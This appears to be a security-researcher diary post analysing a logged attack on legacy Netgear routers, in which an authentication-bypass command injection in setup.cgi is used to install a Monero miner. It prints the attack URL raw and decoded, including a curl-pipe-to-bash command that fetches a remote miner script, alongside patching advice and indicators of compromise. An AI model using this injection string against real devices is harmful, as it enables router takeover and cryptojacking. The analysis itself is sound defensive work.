Routers play an essential role in networking and are one of the key components that allow users to have internet connectivity. Vulnerabilities in routers could result in reduced speeds or the possibility of vulnerable equipment being compromised and turned into part of a botnet. While looking at the DShield weblogs, I noticed an interesting URL in the “First Seen” URLs page as follows:

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=curl+-s+-L+https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh+%7C+bash+-s+4BELisShpWq7UJ2SVTStscdhKjFtYn26qDDhdr9czQWo422PYQjUsv5KygQFhyNg9hEuTN4zz2szgCj5hwSwDw

As usual, let us make it more human-readable via Cyberchef’s URL Decode recipe or Burp Suite’s Decoder:

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 4BELisShpWq7UJ2SVTStscdhKjFtYn26qDDhdr9czQWo422PYQjUsv5KygQFhyNg9hEuTN4zz2szgCj5hwSwDw

We can observe a few artifacts that appear banal at first but get pretty interesting after some thought and correlation of data. Firstly, the URL “/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=” is associated with a 12-year-old Netgear vulnerability that was first reported by Roberto Paleari [1, 2] in May 2013. The vulnerability, with a CVSS 3.1 score of 9.8, affects the Netgear DGN1000, firmware < 1.1.00.48 and Netgear DGN2000 v1 routers. Netgear no longer supports these routers [3], and the vulnerability is pretty serious since it allows authentication bypass and command injection. A check with DShield’s URL history (with reference to Figure 1, note that the searched URL is a subset of the First Seen URL) shows that it remains a favorite URL despite its relatively old age.

Figure 1: URL History for URL Associated with Netgear Router Vulnerability (CVE-2024-12847)

Yet another interesting observation you would have made (or maybe take a second look at Figure 1’s caption) was that this vulnerability was only formally registered in the CVE database in 2024 although it was first disclosed in May 2013, and the corresponding CVE entry was published recently on January 10, 2025 [4].

Finally, let us discuss the elephant in the room. I am unsure why anyone would choose to install a cryptocurrency miner on a router that is around 16 years old (based on FCC database records of Netgear DGN1000 [5]). After careful examination of the associated FCC documents, the processor for the Netgear DGN1000 router was the Infineon AMAZON-SE PSB 50601 HL V1.2 chip. Official processor benchmarks for this chip were unavailable, but the processor would likely not be very performant in cryptocurrency mining. In any case, we can observe a Monero wallet address (4BELisShpWq7UJ2SVTStscdhKjFtYn26qDDhdr9czQWo422PYQjUsv5KygQFhyNg9hEuTN4zz2szgCj5hwSwDw) being included as part of the URL being sent.

I want to think that it is unlikely that anyone is still using the affected Netgear routers due to age. However, the DShield weblogs show that it is still a popular attack vector (no doubt, as it bypasses authentication and allows command injection remotely). Since it is a day just after Microsoft’s Patch Tuesday, why not check on your routers and see if they are up to date and patched with the latest firmware provided by the manufacturer? If you’re visiting friends and family, checking on them and seeing if their routers are updated or require new ones could also be worthwhile. Better yet, as Johannes has suggested in a previous post [6], consider using an open-source router such as pfSense or OPNsense that can help improve your network visibility and cybersecurity posture.

Indicators-of-Compromise (IoCs):
4BELisShpWq7UJ2SVTStscdhKjFtYn26qDDhdr9czQWo422PYQjUsv5KygQFhyNg9hEuTN4zz2szgCj5hwSwDw (Monero (XMR) Wallet Address)

References:
1. https://seclists.org/bugtraq/2013/Jun/8
2. https://www.exploit-db.com/exploits/25978
3. https://www.netgear.com/support/product/dgn1000/
4. https://nvd.nist.gov/vuln/detail/CVE-2024-12847#VulnChangeHistorySection
5. https://fccid.io/PY309300114
6. https://isc.sans.edu/diary/Whats+the+deal+with+these+router+vulnerabilities/29288

-----------
Yee Ching Tok, Ph.D., ISC Handler
Personal Site
Mastodon
Twitter